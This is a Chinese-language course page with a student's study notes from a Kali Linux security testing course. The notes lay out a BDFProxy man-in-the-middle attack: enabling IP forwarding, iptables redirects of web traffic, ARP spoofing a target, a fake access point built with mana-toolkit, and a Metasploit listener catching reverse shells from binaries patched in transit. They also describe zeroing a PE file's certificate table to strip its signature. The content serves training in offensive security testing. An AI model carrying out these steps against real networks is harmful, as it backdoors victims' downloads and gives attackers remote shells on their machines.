846人加入学习
(36人评价)
Kali Linux安全测试

爆款好课 NO.1

价格 ¥ 599.00
该课程属于 武官课程 请加入后再学习

Bdfproxy(mitmproxy)

基于流量劫持动态注入shellcode(ARP spoof,DNS spoof,Fake AP)

步骤

启动路由功能

    sysctl -w net.ipv4.ip_forward=1

    cat /proc/sys/net/ipv4/ip_forward

把对80 443的访问请求重定向到8080

    iptables -t nat -A PREROUTING -p tcp --dport 80/443 -j REDIRECT --to-
ports 8080

修改配置文件

vi /etc/bdfproxy/bdfproxy.cfg

修改工作方式,改成透明代理,默认是regular

proxyMode = transparent

设置好反弹的时候链接谁,有很多情况,因为事先是什么程序不知道

启动欺骗

arpspoof -i eth0 -t 欺骗谁 把我骗成谁

启动msf

用msfconsole调用bdfproxy生成的配置文件,来启动侦听

/usr/share/bdfproxy/xxxx.rc

 

手机欺骗

一加手机适合kali

Mana 创建 Fack AP

修改无线SSID名称

vi /etc/mana-toolkit/hostapd-mana.conf

  修改启动脚本

./usr/share/mana-toolkit/run-mana/start-nat-simple.sh

修改无线网卡适配并启动

流量重定向,两条规则

iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80/443 -j REDIRECT --
to-port 8080

Bdfproxy 代理注入代码

msf侦听反弹shell

Msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

 

补充内容

全站HttPS放注入(微软每个补丁都可能带马),现在已经是https了

数字签名可以被清除,并不是完全之策

全部用0覆盖

PE Header -> Optional Header -> Certificate Table(Address and size)

[展开全文]
hl0rey · 2017-02-24 · Bdfproxy 0